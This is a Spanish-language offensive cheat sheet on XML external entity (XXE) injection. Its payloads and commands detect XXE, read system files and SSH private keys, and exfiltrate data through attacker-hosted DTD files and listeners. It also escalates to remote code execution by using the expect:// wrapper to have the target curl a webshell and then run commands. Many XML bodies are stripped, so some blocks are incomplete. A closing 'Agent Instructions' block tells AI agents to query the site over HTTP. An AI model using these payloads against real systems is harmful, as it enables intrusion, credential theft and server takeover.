# XML external entity (XXE) injection ## Identificación XXE ### General {% tabs %} {% tab title="Request original" %} ```xml MrW0l05zyn example@example.com 112233 ``` {% endtab %} {% endtabs %} {% tabs %} {% tab title="Request modificado" %} ```xml ]> &xxe; example@example.com 112233 ``` {% endtab %} {% endtabs %} ### Out-of-band (OOB) Máquina atacante. ```sh nc -lvnp ``` {% tabs %} {% tab title="Request modificado" %} ```xml :'>]> &xxe; example@example.com 112233 ``` {% endtab %} {% tab title="Request modificado (parameter entities)" %} ```xml :'> %xxe; ]> MrW0l05zyn example@example.com 112233 ``` {% endtab %} {% endtabs %} ## Lectura de archivos ### Lectura de archivo general ```xml # Linux/Unix ]> &xxe; # Windows ]> &xxe; ``` ### Lectura de archivo id\_rsa Lectura de archivo `id_rsa` correspondiente a llave privada de usuario del servicio SSH (Secure SHell). ```xml # Linux/Unix /.ssh/id_rsa'>]> &xxe; # Windows /.ssh/id_rsa'>]> &xxe; ``` ### Lectura de archivo PHP ```xml ">]> &xxe; ``` ### Lectura de archivo utilizando CDATA Creación de archivo DTD (Document Type Definition). {% code title="xxe.dtd" %} ```sh echo '' > xxe.dtd ``` {% endcode %} Habilitación de servidor HTTP para compartir el archivo `xxe.dtd`. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Lectura de archivo. {% hint style="info" %} Es posible que no podamos leer algunos archivos (como index.php), ya que el servidor web evitaría un ataque de DOS causado por la autorreferencia de archivo/entidad (es decir, bucle de referencia de entidad XML). {% endhint %} ```xml "> /xxe.dtd"> %xxe; ]> &joined; example@example.com 112233 ``` ### Lectura de archivo basado en error Creación de archivo DTD (Document Type Definition). {% code title="xxe.dtd" %} ```xml "> %error; %exfil; ``` {% endcode %} Habilitación de servidor HTTP para compartir el archivo `xxe.dtd`. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Lectura de archivo. ```xml /xxe.dtd"> %remote; ]> ``` ### Lectura de archivo basado en XInclude ```xml ``` ### Lectura de archivo out-of-band (OOB) #### HTTP Creación de archivo DTD (Document Type Definition). {% code title="xxe.dtd" %} ```xml /?content=%file;'>" > ``` {% endcode %} Habilitación de servidor PHP. ```sh php -S 0.0.0.0:80 ``` Lectura de archivo. ```xml /xxe.dtd"> %remote; %oob; %exfil; ]> ``` #### PHP (protocol) Creación de archivo DTD (Document Type Definition). {% code title="xxe.dtd" %} ```xml /?content=%file;'>"> ``` {% endcode %} Creación de archivo `index.php`. {% code title="index.php" %} ```php ``` {% endcode %} Habilitación de servidor PHP. ```sh php -S 0.0.0.0:80 ``` Lectura de archivo. ```xml /xxe.dtd"> %remote; %oob; ]> &content; ``` ## XML external entity (XXE) injection a Remote Code Execution (RCE) ### Wrapper expect:// Creación de webshell. {% code title="webshell.php" %} ```php ``` {% endcode %} Habilitación de servidor HTTP para compartir el archivo `webshell.php`. ```sh python -m SimpleHTTPServer python3 -m http.server ``` Ejecución de cURL para descargar archivo `webshell.php` en el servidor. ```xml /webshell.php'"> ]> &xxe; example@example.com 112233 ``` Ejecución de comandos. ```sh http:///webshell.php?cmd=id ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://web.mrw0l05zyn.cl/explotacion/xml-external-entity-xxe-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.